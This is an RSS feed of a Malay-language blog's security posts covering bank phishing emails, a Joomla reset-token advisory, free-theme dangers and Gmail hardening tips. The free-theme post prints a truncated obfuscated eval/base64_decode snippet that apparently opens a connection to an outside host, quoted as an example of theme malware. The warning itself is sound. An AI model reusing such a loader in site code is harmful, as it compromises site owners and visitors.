<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>MohdHafez.net &#187; Keselamatan</title>
	<atom:link href="http://www.mohdhafez.net/category/keselamatan/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.mohdhafez.net</link>
	<description>I need to start with something.</description>
	<lastBuildDate>Thu, 18 Aug 2011 10:44:10 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Jangan Jadi Mangsa Emel Daripada Bank</title>
		<link>http://www.mohdhafez.net/jangan-jadi-mangsa-emel-daripada-bank/</link>
		<comments>http://www.mohdhafez.net/jangan-jadi-mangsa-emel-daripada-bank/#comments</comments>
		<pubDate>Tue, 12 Jan 2010 00:04:34 +0000</pubDate>
		<dc:creator>hafez</dc:creator>
				<category><![CDATA[Keselamatan]]></category>
		<category><![CDATA[bank]]></category>
		<category><![CDATA[cimb]]></category>
		<category><![CDATA[cimb click]]></category>
		<category><![CDATA[emel]]></category>
		<category><![CDATA[maybank2u]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[ragut]]></category>
		<category><![CDATA[skmm.gov.my]]></category>

		<guid isPermaLink="false">http://www.mohdhafez.net/?p=424</guid>
		<description><![CDATA[Seperti anda sedia maklum, kebanyakkan bank di negara ini telah menyediakan kemudahan online banking kepada pelanggannya. Antara online banking paling popular ketika ini adalah seperti Maybank2u dan CimbClick. Saya pasti kebanyakkan daripada anda pernah membuat sekurang-kurangnya sekali transaksi menerusi online banking. Tidak perlulah dinyatakan di sini betapa kemudahan online banking ini amat membantu dan memudahkan [...]]]></description>
			<content:encoded><![CDATA[<p>Seperti anda sedia maklum, kebanyakkan bank di negara ini telah menyediakan kemudahan <em>online banking</em> kepada pelanggannya. Antara <em>online banking</em> paling popular ketika ini adalah seperti Maybank2u dan CimbClick. Saya pasti kebanyakkan daripada anda pernah membuat sekurang-kurangnya sekali transaksi menerusi <em>online banking</em>. Tidak perlulah dinyatakan di sini betapa kemudahan online banking ini amat membantu dan memudahkan urusan anda dengan bank selama ini.</p>
<p>Namun, disebalik keselesaan dalam menggunakan <em>online banking</em>, terdapat ancaman yang anda perlu sentiasa berwaspada. Antaranya adalah seperti emel seperti ini. </p>
<p><img src="http://img137.imageshack.us/img137/4843/maybank2u.jpg" alt="" /></p>
<p><img src="http://img137.imageshack.us/img137/3453/cimbf.jpg" alt="" /></p>
<p>Kelihatan seperti emel rasmi yang dihantar oleh bank itu sendiri. Namun jika diperhatikan pada pautan dalam emel ini, anda sebenarnya akan dibawa ke sebuah laman web <a href="http://en.wikipedia.org/wiki/Phishing">phishing</a>. Jika bernasib baik, pautan tersebut mungkin telah disaring oleh <a href="http://www.skmm.gov.my">Suruhanjaya Komunikasi &#038; Multimedia Malaysia</a> menerusi program antiphishingnya. Jika tidak, kemungkinan maklumat perbankan anda akan <del datetime="2010-01-11T23:09:06+00:00">diragut</del> dicuri dan anda akan kehilangan wang dengan sekelip mata.</p>
<p>Jadi berwaspadalah dengan emel-emel sebegini. Pihak bank biasanya akan menghantar surat, tidak melalui emel sebegini kepada anda.</p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.mohdhafez.net/jangan-jadi-mangsa-emel-daripada-bank/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.mohdhafez.net/jangan-jadi-mangsa-emel-daripada-bank/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Joomla! 1.5.6 Tangani Masalah Token</title>
		<link>http://www.mohdhafez.net/joomla-156-tangani-masalah-token/</link>
		<comments>http://www.mohdhafez.net/joomla-156-tangani-masalah-token/#comments</comments>
		<pubDate>Wed, 13 Aug 2008 00:49:31 +0000</pubDate>
		<dc:creator>hafez</dc:creator>
				<category><![CDATA[Keselamatan]]></category>
		<category><![CDATA[1.5.6]]></category>
		<category><![CDATA[download]]></category>
		<category><![CDATA[joomla]]></category>

		<guid isPermaLink="false">http://www.mohdhafez.net/?p=196</guid>
		<description><![CDATA[Hari ini komuniti Joomla! telah mengumumkan Joomla! siri 1.5.6 (Vusani) telah sedia untuk dipindahturun. Versi ini adalah untuk menangani isu keselamatan tahap tinggi di mana terdapat masalah di dalam fungsi untuk mengingati kata laluan dan disarankan agar semua pengguna Joomla! upgrade Joomla! masing-masing dengan segera. Masalah di dalam versi sebelum ini dilaporkan: A flaw in [...]]]></description>
			<content:encoded><![CDATA[<p><img style="border; 0pt none; float:right; padding-right:10px; padding-bottom:10px" src="http://img32.picoodle.com/img/img32/3/8/12/f_securityrelm_ed99bdd.png" alt="Joomla! 1.5.6" />Hari ini komuniti Joomla! telah mengumumkan Joomla! siri 1.5.6 (Vusani) telah sedia untuk dipindahturun. Versi ini adalah untuk menangani isu keselamatan tahap tinggi di mana terdapat masalah di dalam fungsi untuk mengingati kata laluan dan disarankan agar semua pengguna Joomla! <em>upgrade</em> Joomla! masing-masing dengan segera.</p>
<p>Masalah di dalam versi sebelum ini dilaporkan:</p>
<blockquote><p>
<em>A flaw in the reset token validation mechanism allows for non-validating tokens to be forged. This will allow an unauthenticated, unauthorized user to reset the password of the first enabled user (lowest id). Typically, this is an administrator user. Note, that changing the first users username may lessen the impact of this exploit (since the person who changed the password does not know the login associated with the new password). However, the only way to completely rectify the issue is to upgrade to 1.5.6 (or patch the /components/com_user/models/reset.php file).<br />
For more information about this exploit, visit the Joomla Security Blog http://developer.joomla.org/security.html.</em></p></blockquote>
<p>Download : <a href="http://joomlacode.org/gf/download/frsrelease/8232/30034/Joomla_1.5.6-Stable-Full_Package.zip" target="_blank">Joomla! 1.5.6</a> (5,889 Kb) | <a href="http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&#038;frs_package_id=3883" target="_blank">Upgrade</a></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.mohdhafez.net/joomla-156-tangani-masalah-token/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.mohdhafez.net/joomla-156-tangani-masalah-token/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Jangan Download Themes Percuma</title>
		<link>http://www.mohdhafez.net/jangan-download-themes-percuma/</link>
		<comments>http://www.mohdhafez.net/jangan-download-themes-percuma/#comments</comments>
		<pubDate>Fri, 25 Jul 2008 01:00:30 +0000</pubDate>
		<dc:creator>hafez</dc:creator>
				<category><![CDATA[Keselamatan]]></category>
		<category><![CDATA[free themes]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[themes]]></category>
		<category><![CDATA[worpress]]></category>

		<guid isPermaLink="false">http://www.mohdhafez.net/?p=135</guid>
		<description><![CDATA[Adakah anda menggunakan themes WordPress/Joomla percuma di blog anda? Jika ya, sila uninstall themes anda sekarang dan gunakan default themes sahaja. Seandainya anda berhasrat untuk menukar themes blog anda, pastikan anda tidak menukarnya dengan themes yang diperolehi secara percuma daripada internet dengan sewenang-wenangnya. Ingat! yang percuma itu tidak selalunya baik dan menguntungkan anda. Tahukah anda, [...]]]></description>
			<content:encoded><![CDATA[<p><br/><br />
<img src="http://img37.picoodle.com/img/img37/4/7/24/f_maliciousinm_d46d39a.jpg" alt="Malicious Code In Themes" /><br />
<br/><br />
Adakah anda menggunakan themes <a href="http://wordpress.org/">WordPress</a>/<a href="http://www.joomla.org/">Joomla</a> percuma di blog anda? Jika ya, sila <em>uninstall</em> themes anda sekarang dan gunakan <em>default</em> themes sahaja. Seandainya anda berhasrat untuk menukar themes blog anda, pastikan anda tidak menukarnya dengan themes yang diperolehi secara percuma daripada internet dengan sewenang-wenangnya. <strong>Ingat! yang percuma itu tidak selalunya baik dan menguntungkan anda.</strong><br />
<br/><br />
Tahukah anda, terdapat sebilangan themes yang menarik dan percuma sebenarnya mengandungi <em>malicious code</em> yang mampu melakukan pelbagai aktiviti <del datetime="2008-07-25T00:00:06+00:00">haram</del> seperti menjejaki pengunjung blog anda dan berkebolehan untuk memaparkan iklan-iklan yang tidak sepatutnya. Themes ini juga akan menjana kod tertentu untuk menghasilkan spam atau phishing melalui blog anda tanpa anda sedari.<br />
<br/><br />
Jika anda tidak mampu untuk membeli themes, mungkin kerana themes kesukaan anda terlalu mahal atau anda ingin berjimat cermat anda sebenarnya masih lagi boleh menggunakan themes percuma. Syaratnya, pastikan themes tersebut diperolehi daripada pihak yang menciptanya sendiri yang diyakini benar dan bukan terus melalui pihak ketiga. Kebiasaannya themes-themes percuma ini lebih mudah didapati daripada blog pihak ketiga yang membuat koleksi themes percuma berbanding daripada blog pencipta themes itu sendiri.<br />
<br/><br />
Selain itu, jika anda <del datetime="2008-07-25T00:38:32+00:00">fasih</del> memahami bahasa html atau php, cuba teliti kod-kod yang ada di dalam di dalam themes anda. Pastikan tiada kod yang pelik seperti di bawah, jika ada hapuskan sahaja kod tersebut. Themes percuma tidak memerlukan kod yang dienkrip seperti ini:<br />
<br/></p>
<blockquote><p>
@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\<br />
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\<br />
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\<br />
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\<br />
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\&#8217;));
</p></blockquote>
<p><br/><br />
P/s: Suatu hari saya juga akan membeli themes sendiri, atau mungkin menciptanya sendiri. <img src='http://www.mohdhafez.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
<br/></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.mohdhafez.net/jangan-download-themes-percuma/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.mohdhafez.net/jangan-download-themes-percuma/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Gmail Tidak Selamat</title>
		<link>http://www.mohdhafez.net/gmail-tidak-selamat/</link>
		<comments>http://www.mohdhafez.net/gmail-tidak-selamat/#comments</comments>
		<pubDate>Fri, 28 Dec 2007 21:01:00 +0000</pubDate>
		<dc:creator>hafez</dc:creator>
				<category><![CDATA[Keselamatan]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[emel]]></category>
		<category><![CDATA[gmail]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[penceroboh]]></category>

		<guid isPermaLink="false">http://www.mohdhafez.net/gmail-tidak-selamat/</guid>
		<description><![CDATA[Memang benar, akaun Gmail tidak lagi selamat untuk digunakan. Jika anda menggunakannya sekarang, anda mungkin perlu cari alternatif lain. Saya ada sebab yang munasabah untuk berkata demikian. Saya adalah antara pengguna setia akaun percuma Gmail, dan hampir semua emel-emel saya yang penting terkandung di dalam akaun gmail. Bagaimana pun setelah saya terbaca kisah malang yang [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.picoodle.com/view.php?img=/5/12/28/f_unsafegmailm_49cb77d.jpg&amp;srv=img36" target="_blank"><img src="http://img36.picoodle.com/img/img36/5/12/28/f_unsafegmailm_49cb77d.jpg" alt="Image Hosting by Picoodle.com" border="0" /></a></p>
<p>Memang benar, akaun Gmail tidak lagi selamat untuk digunakan. Jika anda menggunakannya sekarang, anda mungkin perlu cari alternatif lain. Saya ada sebab yang munasabah untuk berkata demikian.</p>
<p>Saya adalah antara pengguna setia akaun percuma <a href="http://gmail.com/" target="_blank">Gmail</a>, dan hampir semua emel-emel saya yang penting terkandung di dalam akaun gmail. Bagaimana pun setelah saya terbaca kisah malang yang menimpa <a href="http://www.davidairey.co.uk/google-gmail-security-hijack/" target="_blank">David Airey</a> baru-baru ini , kepercayaan saya terhadap Gmail telah mula berubah. Saya faham tiada sebarang aplikasi yang boleh dijamin selamat digunakan 100%, tetapi kadang-kala apabila kita kerap(hampir setiap hari) menggunakan sesuatu aplikasi, kita tidak lagi akan mengsyaki atau curiga kepada tahap keselamatannya.</p>
<p>Saya bersyukur kerana perkara buruk yang dialami oleh David tidak berlaku kepada saya, kalau tidak mungkin saya sekarang sedang menghadapi trauma. Bagaimana pun tidaklah saya berniat untuk menamatkan terus perkhidmatan Gmail yang telah banyak berjasa selama ini, cuma saya lebih berhati-hati. Kata orang, beringat-ingat sebelum terlewat. Berikut adalah langkah-langkah awal yang saya telah ambil:<br />
1. Menukar password kepada yang lebih sukar iaitu gabungan nombor, huruf dan simbol.<br />
2. Backup akaun dan emel-emel yang mengandungi maklumat sulit disalin atau dicetak dan seterusnya dihapuskan emel tersebut.<br />
3. Fungi Filter digunakan untuk membuat saringan terhadap emel-emel yang masuk dan emel yang tidak dikenali akan ditandakan sebagai spam dan sekiranya meragukan tidak akan dibuka langsung sebaliknya terus dihapuskan.<br />
4. Folder Drafts, Trash dan Send Mail dikosongkan.<br />
5. Setiap emel yang diterima akan dipastikan siapa penghantarnya dengan klik pada show details.<br />
6. Disable fungsi Forwarding and POP/IMAP di Settings.<br />
7. Memastikan Sign Out digunakan untuk menutup emel.</p>
<p>Mungkin anda merasakan tindakan saya agak paranoid dan agak keterlaluan, namun sekurang-kurangnya hidup saya selepas ini lebih tenteram. Sekiranya berlaku pencerobohan, akibat yang ditanggung tidaklah seteruk mana dan juga tidaklah merugikan sangat.  Saya pasti anda mempunyai pendapat berbeza, silalah kongsi disini yer?.</p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.mohdhafez.net/gmail-tidak-selamat/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.mohdhafez.net/gmail-tidak-selamat/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
	</channel>
</rss>

